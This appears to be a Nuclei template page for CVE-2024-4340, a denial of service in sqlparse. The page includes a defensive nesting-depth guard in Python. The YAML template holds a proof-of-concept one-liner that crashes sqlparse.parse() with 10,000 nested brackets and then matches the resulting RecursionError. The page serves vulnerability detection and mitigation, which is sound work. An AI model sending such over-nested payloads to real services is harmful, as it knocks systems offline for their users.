sqlparse - Denial of Service
ID: CVE-2024-4340
Severity: high
Author: KoYejune0302,cheoljun99,sim4110,gy741
Tags: cve,cve2024,py,code,dos,python,sqlparse
Description
Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.
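As an added example (not code from the template or from sqlparse), the following guard bounds bracket nesting in linear time before the input reaches sqlparse.parse(), so the RecursionError path described above is never entered; MAX_NESTING is an assumed threshold, and sqlparse is assumed to be installed only for the final parse call:

```python
# Added example, not code from the template or from sqlparse: a linear-time
# nesting guard applied before sqlparse.parse() so over-nested input is
# rejected instead of exhausting the interpreter's recursion limit.
# Assumes sqlparse is installed only when safe_parse() is actually called.

# Constructed threshold: legitimate SQL rarely nests more than a handful of
# levels, while the PoC in the template nests 10000 levels.
MAX_NESTING = 64

# Opening bracket -> matching closer; sqlparse groups both kinds recursively.
OPENERS = {"(": ")", "[": "]"}


def max_nesting_depth(sql: str) -> int:
    """Return the deepest bracket nesting found in *sql*.

    Deliberately conservative: brackets inside string literals are counted
    too, and mismatched or stray closers are ignored. Over-counting can only
    reject more input; it can never admit an over-nested statement.
    """
    stack = []
    deepest = 0
    for ch in sql:
        if ch in OPENERS:
            stack.append(OPENERS[ch])
            deepest = max(deepest, len(stack))
        elif stack and ch == stack[-1]:
            stack.pop()
    return deepest


def is_safe_to_parse(sql: str, max_depth: int = MAX_NESTING) -> bool:
    """True if *sql* nests no deeper than *max_depth*."""
    return max_nesting_depth(sql) <= max_depth


def safe_parse(sql: str, max_depth: int = MAX_NESTING):
    """Parse with sqlparse only after the nesting guard passes; raise
    ValueError otherwise. RecursionError is still caught as a fallback for
    recursion the pre-scan does not model."""
    if not is_safe_to_parse(sql, max_depth):
        raise ValueError(
            f"nesting depth {max_nesting_depth(sql)} exceeds limit {max_depth}"
        )
    import sqlparse  # imported lazily so the guard is usable without it
    try:
        return sqlparse.parse(sql)
    except RecursionError as exc:
        raise ValueError("sqlparse exceeded the recursion limit") from exc
```

The guard rejects the template's PoC input at depth 10000 in one pass over the string, while ordinary statements with a few nested parentheses pass through unchanged.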
YAML Source
id: CVE-2024-4340

info:
  name: sqlparse - Denial of Service
  author: KoYejune0302,cheoljun99,sim4110,gy741
  severity: high
  description: |
    Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2024-4340
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4340
  tags: cve,cve2024,py,code,dos,python,sqlparse

self-contained: true

code:
  - engine:
      - sh
      - bash
    source: |
      python -c "import sqlparse; sqlparse.parse('[' * 10000 + ']' * 10000)"

    matchers:
      - type: word
        part: stderr
        words:
          - "RecursionError: maximum recursion depth exceeded"
# digest: 490a0046304402201ac09f592d24f7e3d3087a1f7fbdb85b68416f74d0550fe9d9d9d41898a7b27b02206111d2729c3a07e5e63866a2ec73d167b64e612581728883cb8966797b137cf3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used with the Nuclei tool to check for the vulnerability. Because it is a self-contained code template, it runs the Python snippet locally and matches the RecursionError message on stderr rather than sending requests to the target.
$ nuclei -u "URL" -t "code/cves/2024/CVE-2024-4340.yaml"